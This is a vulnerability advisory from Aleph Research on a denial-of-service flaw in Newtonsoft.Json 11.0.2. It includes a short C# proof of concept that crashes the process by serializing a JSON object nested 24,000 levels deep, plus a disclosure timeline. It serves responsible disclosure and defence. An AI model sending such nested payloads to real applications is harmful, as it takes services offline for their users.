<--

Applications that use Newtonsoft.Json might be exposed to DOS vulnerability

Aleph Research Advisory

Identifier

Severity

Medium

Products

  1. Newtonsoft.Json

Vulnerable Version

11.0.2

Technical Details

A defect in Newtonsoft.Json (aka Json.NET) library might expose applications that use it to a DOS vulnerability.

Json.NET is the No.1 community package in terms of downloads (more than 150,000,000) in Nuget (package manager for .NET). It is used by many web applications as well as Desktop applications to handle Json - serialize, deserialize, etc.

When using this library to serialize a highly nested JSON object, a StackOverflow exception is thrown. This exception cannot be caught and it will immediately terminate the entire process (see our blog post).

This library is not vulnerable by its own, but there might be a lot of scenarios where application that uses it become vulnerable due to this issue.

For example, application that gets JSON as an input and use this library to write it in a pretty format (Indented). In this case, if the input contains a highly nested JSON, the application process will terminate and the application will be unavailable.

Proof Of Concept

Following is a sample program that demonstrate the issue:

using System;
using System.IO;
using System.Linq;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;

namespace JsonTests
{
    class Program
    {
        static void Main(string[] args)
        {
            //Create a string representation of an highly nested object (JSON serialized)
            int nRep = 24000;
            string json = string.Concat(Enumerable.Repeat("{a:", nRep)) + "1" +
                          string.Concat(Enumerable.Repeat("}", nRep));

            //Parse this object (Parsing works well - no exception is being thrown)
            var parsedJson = JObject.Parse(json);
            
            using (var ms = new MemoryStream())
            using (var sWriter = new StreamWriter(ms))
            using (var jWriter = new JsonTextWriter(sWriter))
            {
                //Trying to serialize the object will result in StackOverflowException !!!
                parsedJson.WriteTo(jWriter);
            }

            //ToString throws StackOverflowException as well  (ToString is very unefficient - even for smaller payloads, it will occupy a lot of CPU & Memory)
            //parsedJson.ToString();

            //JsonConvert.SerializeObject throws StackOverflowException as well
            //string a = JsonConvert.SerializeObject(parsedJson);

        }
    }
}

Timeline

  • 22-Oct-18
    : Public disclosure.
  • 25-Sep-18
    : Deadline.
  • 27-Jun-18
    : Reported (Report directly to Newtonsoft).
  • 29-May-18
    : Reported (Report to library owner through NuGet).

Posts

Credit